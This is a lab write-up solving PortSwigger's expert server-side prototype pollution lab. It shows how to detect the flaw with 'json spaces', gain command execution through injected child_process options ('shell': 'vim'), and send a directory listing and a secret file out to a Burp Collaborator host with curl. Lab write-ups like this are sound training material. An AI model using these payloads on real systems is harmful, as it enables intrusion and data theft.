Labs Covered
This write-up focuses on the following EXPERT-level lab from the PortSwigger Web Security Academy related to Prototype Pollution:
10 Exfiltrating sensitive data via server-side prototype pollution
This lab demonstrates how attackers can leverage server-side prototype pollution to extract sensitive information from the application.
LAB 10 - Exfiltrating sensitive data via server-side prototype pollution
Lab Description
Solution
Study the address change feature
Log in and visit your account page.
Submit the form for updating your billing and delivery address.
In Burp, go to the Proxy > HTTP history tab and find the POST /my-account/change-address request.
Observe that when you submit the form, the data from the fields is sent to the server as JSON. Notice that the server responds with a JSON object that appears to represent your user. This has been updated to reflect your new address information.
Send the request to Burp Repeater.
In the image below, we can see the updated data.
Identify a prototype pollution source
-
In Repeater, add a new property to the JSON with the name
__proto__, containing an object with ajson spacesproperty:"__proto__": { "json spaces": 10 } - Send the request.
- In the Response panel, switch to the Raw tab. Notice that the JSON indentation has increased based on the value of your injected property. This strongly suggests that you have successfully polluted the prototype.
Probe for remote code execution
Go to the admin panel and observe that there’s a button for running maintenance jobs.
Click the button and observe that this triggers background tasks that clean up the database and filesystem. This is a classic example of the kind of functionality that may spawn Node child processes.
Try polluting the prototype with a set of malicious properties that control the options passed to the child_process.execSync() method. The injected command should trigger an interaction with the public Burp Collaborator server:
"__proto__": {
"shell": "vim",
"input": ":! curl https://YOUR-COLLABORATOR-ID.oastify.com\n"
}
Send the request.
After sending the request, go to the browser, go to the admin panel, and trigger the maintenance jobs to run.
Observe that, after a short delay, these fail.
In Burp, go to the Collaborator tab and poll for interactions. Observe that you have received several interactions. This confirms the remote code execution.
Leak the hidden file name
In Burp Repeater, modify the payload in your malicious input parameter to a command that leaks the contents of Carlos’s home directory to the public Burp Collaborator server. The following is one approach for doing this:
"input": ":! ls /home/carlos | base64 | curl -d @- https://YOUR-COLLABORATOR-ID.oastify.com\n"
-d: This is a common curl option that tells it to include data in the request body. It’s followed by the data itself or an indicator of where the data comes from.@-: This part tells curl to read the data from standard input (stdin). Standard input is basically the keyboard by default, so you would type the data you want to send directly into the terminal after the curl command.
Send the request.
In the browser, go to the admin panel and trigger the maintenance jobs again.
Go to the Collaborator tab and poll for interactions. Notice that you have received a new HTTP POST request with a Base64-encoded body.
Decode the contents of the body to reveal the names of two entries: node_apps and secret.
Exfiltrate the contents of the secret file
In Burp Repeater, modify the payload in your malicious input parameter to a command that exfiltrates the contents of the file /home/carlos/secret to the public Burp Collaborator server. The following is one approach for doing this:
"input": ":! cat /home/carlos/secret | base64 | curl -d @- https://YOUR-COLLABORATOR-ID.oastify.com\n"
Send the request.
In the browser, go to the admin panel and trigger the maintenance jobs again.
Go to the Collaborator tab and poll for interactions. Notice that you have received a new HTTP POST request with a Base64-encoded body.
Decode the contents of the body to reveal the secret.
In your browser, go to the lab banner and click Submit solution. Submit the decoded secret to solve the lab.